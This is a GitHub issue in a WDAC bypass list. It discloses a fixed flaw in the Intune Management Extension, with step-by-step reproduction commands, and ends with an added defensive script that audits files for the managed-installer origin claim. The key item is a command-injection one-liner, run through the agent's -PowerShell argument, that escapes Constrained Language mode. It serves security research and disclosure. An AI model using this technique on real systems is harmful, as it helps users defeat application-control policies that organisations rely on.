bohops / UltimateWDACBypassList

A centralized resource for previously documented WDAC bypass techniques

Intune Windows Agent bypass explanation #1

Closed kimoppalfens closed 4 months ago

kimoppalfens commented 5 months ago

If you place the screenshots in a subfolder called images in the relative path of this report, then the output/screenshots should appear inline with the report.

Summary

If a device has the Intune Management Extensions configured as a Windows Defender Application Control Managed Installer, then the Intune Management Extensions can be used as a WDAC bypass by a regular user.

FYI, this was fixed by removing the -PowerShell switch below in point 8.

Attachments:

  • Intune Managed Extension WDAC Bypass.md
  • Intune Managed Extension WDAC Bypass.zip
  • Set-IntuneMEasWDACMI.ps1.txt

Description

The executable for the Intune Management Extension, Microsoft.Management.Services.IntuneWindowsAgent.exe, has a -PowerShell parameter. This allows anyone to launch a PowerShell Script using the Intune Management extension. Doing so launches a new PowerShell host that is still locked in PowerShell Constrained Language mode. The arguments on the -PowerShell option are however not escaped correctly allowing command injection.

The command injection can be used to write a new file to disk. That file will receive the NTFS Extended Attribute marking the file as written to disk by the Intune Managed Extension. If the file written to disk is a PowerShell Script these attributes will make sure the script runs trusted in FullLanguage mode. If a PE file is written to disk it would become trusted based on these extended attributes as well.

Steps to Reproduce:

Preparing the machine to be executed as a user with Local Administrator credentials

To quickly reproduce this we'll prepare the machine using local scripts. These preparation steps are done as someone with administrator credentials. They're not part of the actual security issue though. In a regular environment these prerequisites will probably be handled by the Intune environment by someone that wants to use Intune as a Managed Installer.

Defining a Managed installer is documented Here

Setting the Intune Management Extensions as a managed installer

  1. Create temp directory c:\temp by running New-Item -ItemType Directory c:\temp

    images/Screenshot2021-07-17IMEMIBypass01A.png

  2. Set the PowerShell Execution Policy to RemoteSigned as needed by running Set-ExecutionPolicy RemoteSigned

    images/Screenshot2021-07-17IMEMIBypass01b.png

  3. Copy set-ApplockerMIPolicy.ps1 to c:\temp and run the script to define the Intune Management Extension as a WDAC managed installer. (Waiting for the AppLocker binaries to be created could take a while!) Note: the set-ApplockerMIPolicy script was delivered with the report.

    • Navigate to the temp folder by running set-location c:\temp
    • Set the Managed installer policy by running .\Set-ApplockerMIPolicy.PS1

    images/Screenshot2021-07-17IMEMIBypass01c.png

Apply the WDAC Enforced policy with Managed installer functionality

  1. Configure a WDAC Enforced policy with the Managed Installer rule option

    • Copy the Windows Included Example policy DefaultWindows_Enforced to C:\Temp by running copy-item c:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml .\


    • Enable the Windows Managed Installer option in the WDAC policy by running Set-RuleOption -FilePath .\DefaultWindows_Enforced.xml -Option 13
    • Build the binary policy by running ConvertFrom-CiPolicy -XMLFilePath C:\Temp\WDACEnforceWithMI.XML -BinaryFilePath C:\Temp\Binary.bin

    images/Screenshot2021-07-17IMEMIBypass02c.png

    • $Global:SiPolicyPathTemp = Join-Path $env:SystemRoot 'System32\codeintegrity\SIPolicyTmp.p7b'
    • Copy-Item "C:\temp\BinaryPolicy.bin" $Global:SiPolicyPathTemp
    • $wmiResult = Invoke-CimMethod -Namespace root\Microsoft\Windows\CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName Update -Arguments @{FilePath = $Global:SiPolicyPathTemp}

    images/Screenshot2021-07-17IMEMIBypass02d.png

Create a local regular user to test bypass

  1. Create local user named EvilKieken by running New-LocalUser evilkieken

    images/Screenshot2021-07-17IMEMIBypass03a.png

Proof of concept bypass to be executed as a regular user WITHOUT Local Administrator credentials

This step is the weaponisation of the bypass and can be executed as a regular user on a machine that is prepped with the steps above or on any device that has a config where the Intune Management Extensions are configured as a WDAC Managed installer.

  1. Log in as the user evilkieken

  2. Open a PowerShell window as a regular user.

  3. If the Intune Management Extensions are already installed navigate to the installation folder.

    • sl 'C:\Program Files (x86)\Microsoft Intune Management Extension\'
  4. Optional: If the Intune Managed Extensions aren't installed you can bring your own. Copy the Intune Managed Extension folder into C:\Temp if it isn't installed yet.

  5. Navigate to the folder holding the Intune Managed Extension binaries or to c:\temp if you brought your own binaries

    • sl 'C:\Program Files (x86)\Microsoft Intune Management Extension\'

    or

    • sl 'c:\temp'

    images/Screenshot2021-07-17IMEMIBypass11a.png

  6. Check whether PowerShell Constrained Language mode is enabled by running: $ExecutionContext.SessionState.LanguageMode


  7. Check whether method invocation works. This should give an error when PowerShell Constrained Language mode is enforced.

    • Check Method Invocation is blocked by running [math]::sqrt(9)

Notes: This should tell you that the method cannot be invoked in this language mode. The error message reads: Cannot invoke method. Method invocation is supported only on core types in this language mode.

images/Screenshot2021-07-17IMEMIBypass11b.png

  8. Create the PowerShell script to demonstrate the bypass by running

    • .\Microsoft.Management.Services.IntuneWindowsAgent.exe -powershell c:\temp\IMESidecarbypassscript.ps1 c:\temp\IMESidecarBypassOutPut.txt c:\temp\IMESidecarBypassError.txt c:\temp\IMESidecarBypassTimeOut.txt 600 "powershell.exe -command set-content -Path C:\temp\bypass.ps1 -Value '[math]::sqrt(9);`$executioncontext.sessionstate.languagemode' #"

    images/Screenshot2021-07-17IMEMIBypass11b.png

NOTE!: The command above is a single command line

  9. Verify the NTFS Extended attributes have been added to bypass.ps1 by running fsutil.exe file queryea c:\Temp\bypass.ps1

Notes: This should show you the $Kernel.Smartlocker.Originclaim proving the file was written to disk by a managed installer.

images/Screenshot2021-07-17IMEMIBypass11b.png

  10. Validate the bypass works by running C:\temp\bypass.ps1

Notes: The Math invocation function now works and the script specifies it runs in full language mode proving the bypass is functional.

images/Screenshot2021-07-17IMEMIBypass11b.png

Supporting materials/ references:
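An added defensive audit example, not part of the report above or of the UltimateWDACBypassList project: the report checks a single file with fsutil file queryea for the $Kernel.Smartlocker.Originclaim extended attribute. The script below generalises that check to a whole directory tree so an administrator can inventory which scripts and PE files currently carry the managed installer origin claim and review whether they were legitimately deployed. It assumes fsutil.exe is on the PATH, that the account can read the files (run elevated when auditing system-wide paths), and that fsutil prints one "Ea Name:" line per attribute, as it does on current Windows builds; the function names are hypothetical.

```powershell
# Added audit helper (not from the issue or the project). Lists files under a
# root whose NTFS extended attributes include the SmartLocker origin claim,
# i.e. files WDAC will treat as written by a managed installer.
# Assumptions: fsutil.exe on PATH; account can read the files; "Ea Name:"
# line format as printed by fsutil file queryea.

function Get-FileEaNames {
    param([Parameter(Mandatory)][string]$Path)
    # fsutil prints one "Ea Name: <name>" line per extended attribute
    $output = & fsutil.exe file queryea $Path 2>$null
    if ($LASTEXITCODE -ne 0) { return @() }
    $names = foreach ($line in $output) {
        if ($line -match '^\s*Ea Name:\s*(\S+)') { $Matches[1] }
    }
    return @($names)
}

function Find-ManagedInstallerClaimedFiles {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Root,
        # File types worth reviewing: scripts and PE files that WDAC would trust on the claim
        [string[]]$Extension = @('.ps1', '.psm1', '.exe', '.dll')
    )
    Get-ChildItem -Path $Root -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $Extension -contains $_.Extension.ToLowerInvariant() } |
        ForEach-Object {
            $eas   = Get-FileEaNames -Path $_.FullName
            # EA names are case-insensitive; -match is case-insensitive by default
            $claim = $eas | Where-Object { $_ -match 'SMARTLOCKER\.ORIGINCLAIM' }
            if ($claim) {
                [pscustomobject]@{
                    Path          = $_.FullName
                    LastWriteTime = $_.LastWriteTime
                    Owner         = (Get-Acl -Path $_.FullName).Owner
                    EaName        = ($claim -join ',')
                }
            }
        }
}

# Usage: list claimed scripts/binaries under C:\temp modified in the last day
Find-ManagedInstallerClaimedFiles -Root 'C:\temp' |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) } |
    Format-Table -AutoSize
```

Files that carry the claim but were not written by an expected deployment (wrong owner, unexpected location, or a recent write time outside a known rollout) are the ones to investigate; pairing the output with the managed installer AppLocker event log gives the provenance the attribute alone does not.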

bohops commented 4 months ago

@kimoppalfens This is fantastic! Thank you for disclosing the details. I have added the reference to the list!